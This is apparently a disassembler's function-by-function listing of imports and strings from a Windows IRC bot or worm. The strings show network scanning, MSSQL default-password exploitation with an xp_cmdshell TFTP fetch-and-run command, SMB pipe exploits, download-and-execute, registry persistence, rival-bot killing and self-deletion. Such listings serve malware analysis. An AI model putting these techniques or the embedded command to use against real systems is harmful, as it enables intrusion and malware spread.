sub_outside():
NTDLL.RtlFreeHeap
NTDLL.RtlGetLastWin32Error
KERNEL32.GetStartupInfoA
KERNEL32.GetProcessHeap
NTDLL.RtlAllocateHeap
KERNEL32.GetVersionExA
KERNEL32.GetCommandLineA
KERNEL32.InitializeCriticalSection
NTDLL.RtlReAllocateHeap
NTDLL.RtlUnwind
KERNEL32.IsDebuggerPresent
KERNEL32.GetSystemDirectoryA
KERNEL32.GetModuleHandleA
KERNEL32.GetModuleFileNameA
KERNEL32.CopyFileA
KERNEL32.DeleteFileA
KERNEL32.Sleep
KERNEL32.CreateMutexA
KERNEL32.WaitForSingleObject
KERNEL32.ExitProcess
WS2_32.WSAStartup
WS2_32.WSACleanup
|
sub_4102F7(0130):
KERNEL32.GetCPInfo
KERNEL32.MultiByteToWideChar
KERNEL32.WideCharToMultiByte
|
sub_418301(02fe):
KERNEL32.Sleep
|
sub_40F04F(0635):
KERNEL32.FlushFileBuffers
NTDLL.RtlGetLastWin32Error
|
sub_41142B(08d2):
KERNEL32.CreateFileA
"CONOUT$"
|
sub_405E64(08e4):
NTDLL.RtlReAllocateHeap
NTDLL.RtlAllocateHeap
KERNEL32.VirtualAlloc
NTDLL.RtlFreeHeap
|
sub_405266(090a):
KERNEL32.GetModuleHandleA
KERNEL32.GetProcAddress
KERNEL32.InterlockedIncrement
"KERNEL32.DLL"
|
sub_4190BD(0947):
KERNEL32.GetModuleHandleA
KERNEL32.GetModuleFileNameA
KERNEL32.GetSystemDirectoryA
"@echo off\r\n:1\r\ndel \"%s\"\r\nif exist \"%s\" "...
"%s\\tmp-%i%i%i-%c%c%c.bat"
"w"
"%s"
|
sub_4140AB(0997):
KERNEL32.CreateThread
KERNEL32.WaitForSingleObject
|
sub_40BA07(09ac):
"bad exception"
|
sub_419835(0b81):
ADVAPI32.LookupPrivilegeValueA
ADVAPI32.AdjustTokenPrivileges
NTDLL.RtlGetLastWin32Error
|
sub_4105A7(0c06):
KERNEL32.GetProcessHeap
NTDLL.RtlAllocateHeap
NTDLL.RtlFreeHeap
KERNEL32.SetEndOfFile
NTDLL.RtlGetLastWin32Error
|
sub_41B3D0(0e5a):
KERNEL32.ExitThread
WS2_32.socket
WS2_32.htons
WS2_32.sendto
WS2_32.recvfrom
WS2_32.inet_ntoa
WS2_32.closesocket
"rb"
"TFTP: Send Complete To %s. %d Total Sen"...
|
sub_4078A7(0e94):
KERNEL32.ExitProcess
|
sub_41835D(0f66):
WS2_32.accept
|
sub_40B1AB(10e8):
KERNEL32.SetUnhandledExceptionFilter
|
sub_40EC7F(11c8):
KERNEL32.SetStdHandle
|
sub_419C6D(15eb):
ADVAPI32.RegOpenKeyExA
ADVAPI32.RegEnumKeyA
ADVAPI32.RegCloseKey
"SYSTEM\\ControlSet001\\Services\\Eventlog\\"...
"%s\\%s"
"LDM"
"NetDDE"
"EventMessageFile"
|
sub_40F524(1716):
KERNEL32.LoadLibraryA
KERNEL32.GetProcAddress
"USER32.DLL"
"MessageBoxA"
"GetActiveWindow"
"GetLastActivePopup"
"GetUserObjectInformationA"
"GetProcessWindowStation"
|
sub_418396(17c7):
"%x"
|
sub_4172CC(191f):
WS2_32.send
|
sub_40F846(1a01):
KERNEL32.RaiseException
|
sub_4199AC(1b08):
KERNEL32.SuspendThread
KERNEL32.CloseHandle
|
sub_419948(1b08):
KERNEL32.ResumeThread
KERNEL32.CloseHandle
|
sub_404ABE(1b24):
KERNEL32.GetCPInfo
|
sub_402E3D(1c1d):
KERNEL32.IsDebuggerPresent
KERNEL32.SetUnhandledExceptionFilter
KERNEL32.UnhandledExceptionFilter
KERNEL32.GetCurrentProcess
KERNEL32.TerminateProcess
|
sub_4041BB(2094):
KERNEL32.RaiseException
|
sub_40243A(227c):
"Scanner"
"Scan: All Scan Threads Stopped. %d kill"...
|
sub_40D5D3(240f):
KERNEL32.WideCharToMultiByte
NTDLL.RtlGetLastWin32Error
|
sub_419C1D(2492):
ADVAPI32.OpenSCManagerA
ADVAPI32.OpenServiceA
ADVAPI32.DeleteService
ADVAPI32.CloseServiceHandle
|
sub_405ADD(2585):
NTDLL.RtlAllocateHeap
|
sub_401E82(283c):
WS2_32.inet_addr
WS2_32.gethostbyaddr
"Net: IP: %s Host: N/A"
"Net: IP: %s Host: %s"
|
sub_40E072(2989):
KERNEL32.CreateFileA
NTDLL.RtlGetLastWin32Error
KERNEL32.GetFileType
KERNEL32.CloseHandle
|
sub_41A391(2b9b):
ADVAPI32.RegOpenKeyExA
ADVAPI32.RegCloseKey
"HARDWARE\\DESCRIPTION\\System\\CentralProc"...
"~MHz"
"ProcessorNameString"
"%s"
"%s%c"
"Unknown"
"HARDWARE\\DESCRIPTION\\System\\CentralProc"...
|
sub_41748B(2ce1):
USER32.GetCursorPos
KERNEL32.GetTickCount
"qwertyuiopasdfghjklzxcvbnmQWERTYUIOPLKJ"...
"["
"%s%s|"
"%s%s|"
"%sP|"
"%s0%I64u|"
"%s%I64u|"
"%s%c"
"%s]"
|
sub_402A45(2daa):
NTDLL.RtlSizeHeap
|
sub_417676(2e07):
" "
"-s"
"/s"
" "
|
sub_4196D1(2f90):
"hJdXZOPvUVmRJfVS"
"hJdXZOPvUVmRJfVS"
"%s%c"
|
sub_40EE8E(34be):
NTDLL.RtlLeaveCriticalSection
|
sub_40F3BD(364e):
KERNEL32.MultiByteToWideChar
|
sub_409DAD(3aac):
KERNEL32.ReadFile
NTDLL.RtlGetLastWin32Error
KERNEL32.MultiByteToWideChar
|
sub_419219(3b18):
KERNEL32.CreateProcessA
|
sub_419347(4006):
"192.168.*.*"
"10.*.*.*"
"111.*.*.*"
"15.*.*.*"
"16.*.*.*"
"101.*.*.*"
"110.*.*.*"
"112.*.*.*"
"172.%d.*.*"
|
sub_4113D0(4634):
KERNEL32.GetModuleHandleA
KERNEL32.GetProcAddress
"KERNEL32"
"IsProcessorFeaturePresent"
|
sub_410A54(4658):
"e+000"
|
sub_41802F(4738):
WS2_32.socket
WS2_32.closesocket
WS2_32.gethostbyname
WS2_32.htons
WS2_32.connect
"ÅÔÆÆ"
"%s %s\r\n"
"%s-%s"
"ÛÜÖÞ"
"ÀÆÐÇ"
"%s %s\r\n%s %s 0 0 :%s\r\n"
|
sub_401C1D(496a):
"http://%s:%d/%s"
|
sub_419677(4a5c):
KERNEL32.LoadLibraryA
KERNEL32.GetProcAddress
"user32.dll"
|
sub_40C33C(4d78):
KERNEL32.GetStringTypeW
NTDLL.RtlGetLastWin32Error
KERNEL32.MultiByteToWideChar
KERNEL32.GetStringTypeA
|
sub_40251A(4e0b):
"Statistics: Exploits:"
"%s %s: %d"
"%s; Daemons:"
"%s TFTP: %d"
"%s HTTP: %d"
|
sub_40818A(4f5e):
NTDLL.RtlEnterCriticalSection
|
sub_4081DC(4f5e):
NTDLL.RtlLeaveCriticalSection
|
sub_416F86(50c0):
KERNEL32.GetSystemDirectoryA
"%s\\%s"
"SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
"SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
|
sub_401F1C(51c2):
"Scan: Unknown Exploit."
"*.*.*.*"
"-a"
"-b"
"-c"
"Scan: Not Enough Threads. %d Available."...
"%d.%d.%d.%d"
"x."
"%d."
"%s%d."
"%sx."
"%sx"
"%s%d"
"%d.%d.%d.%d"
"%d.%d.%d.x"
"%d.%d.x.x"
"%d.x.x.x"
"Scan: %s:%d Using %d Threads."
"Scanner"
|
sub_401CC0(56d8):
KERNEL32.GlobalMemoryStatus
ADVAPI32.GetUserNameA
KERNEL32.GetSystemDirectoryA
"System: %s [CPU: %i x %s @ %dMhz] [RAM:"...
|
sub_404F61(5886):
KERNEL32.InterlockedIncrement
|
sub_40A42B(58d9):
"pow"
"exp"
"exp"
"log10"
"log10"
"log"
"log"
"pow"
"pow"
"exp10"
|
sub_41C370(5b30):
"download"
"update"
"http"
"sysinfo"
"netinfo"
"scan.start"
"scan.stop"
"scan.stats"
|
sub_4058CA(5be9):
NTDLL.RtlDeleteCriticalSection
|
sub_417361(5fcf):
WS2_32.send
"ÅÇÜÃØÆÒ"
"%s %s %s\r\n"
|
sub_40773A(60a0):
KERNEL32.Sleep
|
sub_41B1A0(6107):
WS2_32.inet_ntoa
"sa"
"root"
"admin"
"DRIVER={SQL Server};SERVER=%s,%d;UID=%s"...
"EXEC master..xp_cmdshell 'tftp -i %s GE"...
"%s: Exploited %s."
|
sub_41A8D5(62e3):
WS2_32.htons
WS2_32.socket
WS2_32.connect
WS2_32.closesocket
WS2_32.send
|
sub_41B925(64a5):
WININET.InternetOpenA
WININET.InternetOpenUrlA
KERNEL32.CreateFileA
KERNEL32.GetTickCount
WININET.InternetReadFile
KERNEL32.WriteFile
KERNEL32.CloseHandle
KERNEL32.IsDebuggerPresent
KERNEL32.GetCurrentThreadId
"Mozilla/5.0"
"DL: Downloading %s to %s"
"DL: Download %s (%i Bytes) finished in "...
"Main: Uninstalling Drone"
"DL: Failed; Bad Location."
"DL: Failed To Update"
"DL: Error Executing File."
"DL: Executed File: %s"
"DL: Failed; Bad URL"
"DL: Failed; WinINET Error"
|
sub_41075B(65eb):
KERNEL32.SetFilePointer
NTDLL.RtlGetLastWin32Error
|
sub_4077C2(6721):
KERNEL32.Sleep
|
sub_40EEB0(68c8):
NTDLL.RtlEnterCriticalSection
NTDLL.RtlLeaveCriticalSection
|
sub_405F14(6919):
KERNEL32.VirtualAlloc
|
sub_4051FF(6a4c):
KERNEL32.TlsGetValue
KERNEL32.TlsSetValue
|
sub_4081FF(6a78):
"ccs="
"UTF-8"
"UTF-16LE"
"UNICODE"
|
sub_403540(6b5b):
KERNEL32.GetSystemTimeAsFileTime
|
sub_4016BA(6c31):
"list too long"
|
sub_40121E(6c31):
"list too long"
|
sub_419477(6d5f):
KERNEL32.ExitProcess
"Registry Monitor"
"SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
"QUIT :%s YOU KILLED ME :< --UPDATED\r\n"
|
sub_404A44(705a):
KERNEL32.GetOEMCP
KERNEL32.GetACP
|
sub_4104DC(71e5):
KERNEL32.WriteConsoleW
NTDLL.RtlGetLastWin32Error
KERNEL32.GetConsoleOutputCP
KERNEL32.WideCharToMultiByte
KERNEL32.WriteConsoleA
|
sub_40CB14(7249):
KERNEL32.GetModuleHandleA
KERNEL32.GetProcAddress
KERNEL32.MultiByteToWideChar
NTDLL.RtlRestoreLastWin32Error
"kernel32.dll"
"InitializeCriticalSectionAndSpinCount"
|
sub_4184BF(726a):
"\r\n"
" "
" "
" "
"\r\n\r\n"
|
sub_40AA15(7887):
KERNEL32.UnhandledExceptionFilter
|
sub_40468E(7a5e):
KERNEL32.IsDebuggerPresent
KERNEL32.SetUnhandledExceptionFilter
KERNEL32.UnhandledExceptionFilter
KERNEL32.GetCurrentProcess
KERNEL32.TerminateProcess
|
sub_419A9F(7c37):
ADVAPI32.RegOpenKeyExA
ADVAPI32.RegEnumValueA
ADVAPI32.RegCloseKey
"SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
"SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
"SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
"SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
|
sub_418E51(7d6d):
KERNEL32.GetVersionExA
"VIS"
"2K3"
"XP"
"2K"
"ME"
"98"
"NT"
"95"
"UNK"
"[OS: Microsoft Windows %s %s (%i.%i bui"...
"%s"
|
sub_4026B9(7f6b):
"invalid string position"
|
sub_418DA0(824c):
KERNEL32.QueryPerformanceCounter
KERNEL32.QueryPerformanceFrequency
|
sub_40CCBE(83d5):
KERNEL32.SetFilePointer
NTDLL.RtlGetLastWin32Error
|
sub_404816(87b5):
KERNEL32.GetCPInfo
|
sub_41397C(8861):
WS2_32.socket
WS2_32.htons
WS2_32.ioctlsocket
WS2_32.connect
WS2_32.select
WS2_32.closesocket
|
sub_418FC6(88b5):
WS2_32.getsockname
"%d.%d.%d.%d"
|
sub_416E5F(8b9b):
ADVAPI32.RegCreateKeyExA
ADVAPI32.RegCloseKey
ADVAPI32.RegSetValueExA
|
sub_41829C(8bd0):
"ÛÜÖÞ"
"%s %s\r\n"
|
sub_41A5C1(8db9):
KERNEL32.lstrlen
"http://%s:%d/%s"
"http://%s:%d/%s"
|
sub_404FE7(9237):
KERNEL32.InterlockedDecrement
|
sub_41783D(93dd):
"%s"
" :"
"%s"
" "
"%s"
" "
"ÅÜÛÒ"
"ÞÜÖÞ"
"ÅÇÜÃØÆÒ"
"ÅÚÛÒ"
"%s %s\r\n"
"ßÚÜÛ"
"%s %s %s\r\n"
"001"
"ßÚÜÛ"
"ØÚÑÐ"
"%s %s %s\r\n%s %s %s\r\n"
"332"
" :"
"%s"
"!"
"%s"
"332"
"%s"
"%s"
"%s"
";"
";"
";"
|
sub_418B1F(9941):
KERNEL32.GetSystemDirectoryA
WS2_32.socket
WS2_32.closesocket
WS2_32.htons
WS2_32.bind
WS2_32.WSAAsyncSelect
WS2_32.listen
"%s\\%s"
|
sub_416ECD(9e8f):
ADVAPI32.RegOpenKeyExA
ADVAPI32.RegQueryValueExA
ADVAPI32.RegCloseKey
|
sub_418E1F(a0a6):
KERNEL32.GetLocaleInfoA
|
sub_40DFD3(a109):
NTDLL.RtlDeleteCriticalSection
|
sub_419760(a203):
KERNEL32.GetTickCount
ADVAPI32.QueryServiceStatusEx
NTDLL.RtlGetLastWin32Error
KERNEL32.Sleep
ADVAPI32.ControlService
|
sub_40CE5A(a83e):
KERNEL32.GetConsoleMode
KERNEL32.GetConsoleCP
KERNEL32.WideCharToMultiByte
KERNEL32.WriteFile
NTDLL.RtlGetLastWin32Error
|
sub_41B5D2(a924):
WS2_32.socket
KERNEL32.ExitThread
WS2_32.setsockopt
WS2_32.htons
WS2_32.bind
WS2_32.closesocket
WS2_32.select
WS2_32.recvfrom
KERNEL32.CreateThread
KERNEL32.Sleep
|
sub_4054D6(a9bf):
KERNEL32.GetModuleHandleA
KERNEL32.GetProcAddress
KERNEL32.TlsAlloc
KERNEL32.TlsSetValue
KERNEL32.TlsFree
KERNEL32.GetCurrentThreadId
"KERNEL32.DLL"
"FlsGetValue"
"FlsSetValue"
"FlsFree"
|
sub_419EA0(aba5):
KERNEL32.GetCurrentProcessId
KERNEL32.GetModuleHandleA
KERNEL32.GetProcAddress
KERNEL32.LoadLibraryA
KERNEL32.GetSystemDirectoryA
KERNEL32.GetCurrentThread
ADVAPI32.OpenThreadToken
NTDLL.RtlGetLastWin32Error
ADVAPI32.ImpersonateSelf
KERNEL32.CloseHandle
KERNEL32.Sleep
KERNEL32.GetCurrentThreadId
"winlogon.exe"
"svchost.exe"
"services.exe"
"OpenThread"
"kernel32.dll"
"OpenProcess"
"kernel32.dll"
"CreateToolhelp32Snapshot"
"kernel32.dll"
"Process32First"
"kernel32.dll"
"kernel32.dll"
"kernel32.dll"
"Module32Next"
"kernel32.dll"
"kernel32.dll"
"Thread32Next"
"kernel32.dll"
"ReadProcessMemory"
"kernel32.dll"
"GetModuleFileNameExA"
"psapi.dll"
"%s\\%s"
"SeDebugPrivilege"
"SeDebugPrivilege"
"System"
"Bot Killed: %s"
|
sub_4036E0(ad53):
NTDLL.RtlAllocateHeap
|
sub_40B18A(add8):
KERNEL32.SetUnhandledExceptionFilter
|
sub_418D17(aecd):
"HS"
|
sub_40AE54(b143):
KERNEL32.GetModuleFileNameA
"C:\\m_unpacker\\packed.exe"
|
sub_4102B0(b2da):
KERNEL32.GetLocaleInfoA
|
sub_41C550(b3e6):
KERNEL32.GetModuleFileNameA
|
sub_40ECFC(b451):
KERNEL32.SetStdHandle
|
sub_418552(b570):
WS2_32.recv
WS2_32.send
KERNEL32.CreateFileA
KERNEL32.GetFileSize
KERNEL32.SetFilePointer
KERNEL32.ReadFile
WS2_32.getpeername
WS2_32.gethostbyaddr
WS2_32.closesocket
"GET"
"Que?"
"HTTP/1.1 501 Not Implemented\r\nContent-L"...
"%s\\%s\\%s"
"%s\\%s\\%s%s"
"%s\\%s"
"Que?"
"Que?"
"HTTP/1.1 200 ok\r\nContent-Length: %d\r\nCo"...
"HTTP: Transfer: %d.%d.%d.%d (N/A). %d T"...
"HTTP: Transfer: %d.%d.%d.%d (%s). %d To"...
|
sub_40780D(b9d5):
KERNEL32.Sleep
|
sub_4195EC(b9ea):
KERNEL32.GetCurrentProcess
KERNEL32.VirtualAllocEx
KERNEL32.VirtualProtectEx
WS2_32.send
KERNEL32.VirtualFreeEx
|
sub_407881(bdfc):
KERNEL32.GetModuleHandleA
KERNEL32.GetProcAddress
"mscoree.dll"
"CorExitProcess"
|
sub_41A9DE(c258):
WS2_32.inet_ntoa
KERNEL32.CreateFileA
KERNEL32.WriteFile
KERNEL32.ReadFile
KERNEL32.GetTickCount
KERNEL32.CreateEventA
NTDLL.RtlGetLastWin32Error
KERNEL32.WaitForSingleObject
KERNEL32.CloseHandle
"."
"\\\\%s\\ipc$"
"\\\\%s\\pipe\\browser"
"http://%s:%d/%s"
"http://%s:%d/%s"
"%s: Exploited: %s."
|
sub_414023(c316):
KERNEL32.TerminateThread
|
sub_4059F7(c36e):
NTDLL.RtlEnterCriticalSection
|
sub_40B08A(c391):
KERNEL32.GetSystemTimeAsFileTime
KERNEL32.GetCurrentProcessId
KERNEL32.GetCurrentThreadId
KERNEL32.GetTickCount
KERNEL32.QueryPerformanceCounter
|
sub_418C40(c642):
USER32.LoadIconA
USER32.LoadCursorA
USER32.RegisterClassExA
USER32.CreateWindowExA
USER32.TranslateMessage
USER32.DispatchMessageA
USER32.GetMessageA
" "
|
sub_40591F(c70d):
NTDLL.RtlLeaveCriticalSection
|
sub_4087E0(ca1e):
KERNEL32.GetStartupInfoA
KERNEL32.GetFileType
KERNEL32.GetStdHandle
KERNEL32.LockResource
|
sub_40423C(cba9):
NTDLL.RtlUnwind
|
sub_409AB4(cd6e):
KERNEL32.GetModuleFileNameA
KERNEL32.GetStdHandle
KERNEL32.WriteFile
"Runtime Error!\n\nProgram: "
""
"..."
"\n\n"
"Microsoft Visual C++ Runtime Library"
|
sub_40AF0D(ced3):
KERNEL32.GetEnvironmentStringsW
NTDLL.RtlGetLastWin32Error
KERNEL32.WideCharToMultiByte
KERNEL32.FreeEnvironmentStringsW
KERNEL32.GetEnvironmentStrings
KERNEL32.FreeEnvironmentStringsA
|
sub_4049A0(d02f):
KERNEL32.InterlockedDecrement
KERNEL32.InterlockedIncrement
|
sub_40D94F(d327):
NTDLL.RtlAllocateHeap
|
sub_4081AD(d432):
NTDLL.RtlLeaveCriticalSection
|
sub_40815B(d432):
NTDLL.RtlEnterCriticalSection
|
sub_40BF57(d5b0):
KERNEL32.LCMapStringW
NTDLL.RtlGetLastWin32Error
KERNEL32.MultiByteToWideChar
KERNEL32.WideCharToMultiByte
KERNEL32.LCMapStringA
|
sub_405229(d7e5):
KERNEL32.TlsFree
|
sub_404C69(d858):
KERNEL32.InterlockedDecrement
KERNEL32.InterlockedIncrement
|
sub_413A2D(dc58):
KERNEL32.Sleep
"%d.%d.%d.%d"
"%s"
"%s"
"%s"
"%s"
|
sub_41B775(dd03):
KERNEL32.GetModuleHandleA
KERNEL32.GetModuleFileNameA
"TFTP Server"
|
sub_40EDEE(e051):
NTDLL.RtlEnterCriticalSection
|
sub_4053B5(e07f):
KERNEL32.InterlockedDecrement
|
sub_41144A(e22c):
KERNEL32.CloseHandle
|
sub_4019F3(e2f5):
"¡×¥¤Ð£§Ñ¤¤¡£Ð¤Ð§ÑÑ£¬¤Ó×ÖЬ ¢¢×¦ ÐЦ"...
"UPD: Auth Failure."
"UPD: Invalid Arguments."
|
sub_40DA6D(e37e):
NTDLL.RtlAllocateHeap
NTDLL.RtlReAllocateHeap
|
sub_412AB1(e396):
"1#SNAN"
"1#IND"
"1#INF"
"1#QNAN"
|
sub_405193(e3a2):
KERNEL32.TlsGetValue
KERNEL32.GetModuleHandleA
KERNEL32.GetProcAddress
"KERNEL32.DLL"
|
sub_405127(e3a2):
KERNEL32.TlsGetValue
KERNEL32.GetModuleHandleA
KERNEL32.GetProcAddress
"KERNEL32.DLL"
|
sub_405A83(e479):
KERNEL32.HeapCreate
KERNEL32.HeapDestroy
|
sub_4084A1(e48e):
NTDLL.RtlEnterCriticalSection
|
sub_417119(e4c8):
KERNEL32.GetSystemDirectoryA
KERNEL32.Sleep
"%s\\%s"
"SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
"SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
|
sub_419A10(e5e3):
KERNEL32.CloseHandle
|
sub_4101BD(e6d5):
KERNEL32.SetUnhandledExceptionFilter
KERNEL32.UnhandledExceptionFilter
|
sub_419E55(ea56):
KERNEL32.TerminateProcess
KERNEL32.Sleep
KERNEL32.DeleteFileA
|
sub_4051F6(ef17):
KERNEL32.TlsAlloc
|
sub_417F01(ef3c):
WS2_32.recv
WS2_32.closesocket
"\r\n"
"%s"
"\r\n"
|
sub_40531A(efa1):
NTDLL.RtlGetLastWin32Error
KERNEL32.TlsGetValue
KERNEL32.GetCurrentThreadId
NTDLL.RtlRestoreLastWin32Error
|
sub_41B7F9(f270):
"%s"
"%s%X"
|
sub_4086EA(f36d):
NTDLL.RtlUnwind
|
sub_40177B(f394):
"У¤¡¤ÓÑ ×ÐÓ¤¦¬Ñ£¦Ó§Ô¦Ð¦ÐÑÑÐÑÖÐÑ ÐѦ§£"...
"DL: Auth Failure."
"DL: Invalid Arguments"
|
sub_416F32(f3a8):
ADVAPI32.RegCreateKeyExA
ADVAPI32.RegCloseKey
ADVAPI32.RegDeleteValueA
|
sub_416D6C(f44a):
KERNEL32.WriteFile
|
sub_40777A(f675):
KERNEL32.Sleep
|
sub_405B50(f7b2):
KERNEL32.VirtualFree
NTDLL.RtlFreeHeap
|
sub_408A4D(fb55):
KERNEL32.CloseHandle
NTDLL.RtlGetLastWin32Error
|